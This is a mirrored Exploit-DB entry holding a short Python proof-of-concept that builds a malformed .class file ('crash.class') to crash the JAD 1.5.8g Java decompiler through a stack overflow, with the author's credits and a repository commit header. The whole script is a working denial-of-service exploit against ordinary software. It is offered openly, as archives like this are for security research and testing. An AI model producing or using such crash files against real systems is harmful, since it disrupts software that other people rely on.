exploit-db-mirror/exploits/windows/dos/11670.py
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

14 lines
No EOL
393 B
Python
Executable file

#!/usr/bin/env python
#JAD java decompiler 1.5.8g (.class) Stack Overflow DoS
#Tested on Windows
#Software Link: http://www.varaneckas.com/jad
#Author: l3D
#Site: http://xraysecurity.blogspot.com
#IRC: irc://irc.nix.co.il
#Email: pupipup33@gmail.com
header='\xca\xfe\xba\xbe\x01\x04\x01\x04\xff\xff'
evil='\x07\x01\x01'*0x100000
bad=open('crash.class', 'w')
bad.write(header+evil)
bad.close()